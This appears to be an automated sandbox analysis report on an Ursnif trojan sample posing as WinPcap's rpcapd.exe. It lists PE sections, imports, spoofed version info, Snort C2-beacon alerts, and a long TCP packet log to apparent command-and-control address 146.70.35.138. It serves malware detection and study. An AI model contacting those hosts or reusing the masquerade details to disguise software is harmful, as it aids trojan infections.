                                        .data0x820000x149570x12000False0.179578993056data5.40188601701IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .idata0x970000xadd0x1000False0.217041015625data2.64887682924IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .rsrc0x980000x7030x1000False0.1220703125data1.10395588442IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x990000x53a50x6000False0.152099609375data5.13419580461IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_VERSION0x981700x3d0data

                                        Imports

                                        DLLImport
                                        WINSPOOL.DRVGetPrinterDriverDirectoryA, GetPrinterDataExW, DeletePrinterConnectionW, FindFirstPrinterChangeNotification, FindClosePrinterChangeNotification
                                        msvcrt.dlltoupper
                                        USER32.dllDestroyIcon, GetWindowTextA, DrawFrameControl, LoadAcceleratorsA, GetTitleBarInfo, GetMessageExtraInfo, DrawTextW
                                        OLEAUT32.dllLHashValOfNameSysA
                                        SHELL32.dllFindExecutableW
                                        KERNEL32.dlllstrlenW, GetBinaryTypeW, GetModuleFileNameW, GetModuleHandleW, GetLastError, GetNLSVersion, GetSystemWindowsDirectoryA, lstrcpynA, GetCurrentThread, GetDefaultCommConfigW, ExitProcess, GetSystemDirectoryW, GetCommandLineA, FindNextVolumeMountPointW, DeleteCriticalSection, LockResource, GetCurrentDirectoryA, GetDefaultCommConfigA
                                        Secur32.dllInitializeSecurityContextW
                                        ADVAPI32.dllGetOldestEventLogRecord, FindFirstFreeAce, GetLengthSid, EnumServicesStatusW, RegOpenKeyA, GetPrivateObjectSecurity, GetSecurityDescriptorOwner
                                        GDI32.dllGetCurrentPositionEx, GetBrushOrgEx, GetTextExtentExPointW

                                        Version Infos

                                        DescriptionData
                                        LegalCopyrightCopyright 2005-2007 CACE Technologies. Copyright 2003-2005 NetGroup, Politecnico di Torino.
                                        InternalNamerpcapd
                                        FileVersion4.0.0.1040
                                        CompanyNameCACE Technologies
                                        LegalTrademarks
                                        ProductNameWinPcap
                                        ProductVersion4.0.0.1040
                                        FileDescriptionRemote Packet Capture Daemon
                                        Build Description
                                        OriginalFilenamerpcapd.exe
                                        Translation0x0000 0x04b0

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        04/22/22-18:13:04.407179 04/22/22-18:13:04.407179TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977380192.168.2.5146.70.35.138
                                        04/22/22-18:12:43.292918 04/22/22-18:12:43.292918TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4975880192.168.2.513.107.42.16
                                        04/22/22-18:13:05.383399 04/22/22-18:13:05.383399TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4977380192.168.2.5146.70.35.138
                                        04/22/22-18:13:03.616504 04/22/22-18:13:03.616504TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4977380192.168.2.5146.70.35.138

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 22, 2022 18:13:03.589531898 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.615566015 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.615808964 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.616503954 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.643296957 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994354963 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994388103 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994402885 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994417906 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994436026 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994443893 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994450092 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994469881 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994502068 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994559050 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994601011 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994689941 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994702101 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994748116 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994818926 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994837046 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994848967 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994856119 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994877100 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.994941950 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.994978905 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:03.995069981 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:03.995109081 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.034974098 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.034996033 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035008907 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035026073 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035039902 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035048962 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035093069 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035511017 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035528898 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035540104 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035558939 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035586119 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035588026 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035598993 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035643101 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035742044 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035761118 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035772085 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035789013 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035806894 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035816908 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035820007 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035830975 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035836935 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.035844088 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035868883 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.035904884 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.059910059 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.060010910 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.074975967 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.074997902 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075010061 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075026989 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075074911 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075103045 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075443029 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075462103 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075473070 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075490952 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075509071 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075560093 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075582981 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075601101 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075613022 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075644970 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075669050 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075681925 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075696945 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075709105 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075750113 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075766087 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075799942 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075815916 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075828075 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.075849056 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.075874090 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.083607912 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.083715916 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115084887 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115109921 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115120888 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115134001 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115147114 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115158081 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115223885 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115266085 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115417004 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115436077 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115446091 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115462065 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115484953 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115506887 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115519047 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115530968 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115535021 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115587950 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115869045 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115886927 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115897894 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115915060 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115931034 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115943909 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.115962982 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115988970 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.115995884 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.116130114 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.116199017 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.154901981 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.154927969 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.154942036 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.154953957 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.154968023 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155050039 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155101061 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155148983 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155165911 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155178070 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155204058 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155205965 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155220985 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155232906 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155240059 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155266047 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155380964 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155399084 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155410051 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155440092 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155459881 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155616999 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155636072 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155646086 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155673981 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155695915 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155699968 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155786037 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.155841112 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155872107 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.155883074 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.156006098 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.156058073 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.156090021 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.178720951 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.178812981 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.195175886 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195199013 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195213079 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195230007 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195280075 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.195338011 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.195791006 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195849895 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.195869923 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195882082 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195909023 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195921898 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.195925951 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195939064 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195960045 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.195981026 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.195988894 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196001053 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196012020 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196023941 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196028948 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196046114 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196054935 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196058035 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196079969 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196187973 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196254015 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196321011 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196337938 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196350098 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196376085 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196398973 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.196492910 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.196541071 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.202294111 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.202382088 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236242056 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236265898 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236277103 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236294031 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236305952 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236340046 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236371994 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236582041 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236598969 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236610889 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236628056 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236640930 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236689091 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236704111 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236716032 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236731052 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236766100 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236773968 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236785889 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236798048 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236812115 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236845970 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236865044 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236877918 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.236882925 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.236917019 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.237006903 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.237076044 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.237095118 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.237107038 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.237107992 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.237153053 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.237205029 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.237268925 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.260029078 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.260184050 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.276608944 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.276633978 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.276647091 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.276662111 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.276906967 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.276932955 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.276998043 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277004004 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277019024 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277030945 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277111053 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277123928 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277158022 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277178049 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277215958 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277232885 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277236938 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277245045 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277312040 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277436018 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277453899 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277466059 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277479887 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277498960 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277517080 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277527094 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277546883 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277551889 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.277606010 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.277692080 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.283658981 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.283817053 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.316185951 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316205025 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316215992 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316232920 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316246033 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316399097 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.316962004 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316981077 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.316993952 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317054987 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317060947 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.317073107 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317081928 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317143917 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317192078 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.317239046 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317251921 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317266941 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317267895 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.317285061 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317298889 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317368984 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317398071 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.317464113 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317481041 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317492962 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317506075 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.317545891 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.317677021 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.341089964 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.341150045 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.356317997 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356352091 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356364012 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356381893 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356443882 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.356499910 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.356822014 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356841087 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356853008 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356870890 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.356875896 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.356923103 CEST4977380192.168.2.5146.70.35.138
                                        Apr 22, 2022 18:13:04.357080936 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.357110023 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.357122898 CEST8049773146.70.35.138192.168.2.5
                                        Apr 22, 2022 18:13:04.357126951 CEST4977380192.168.2.5146.70.35.138
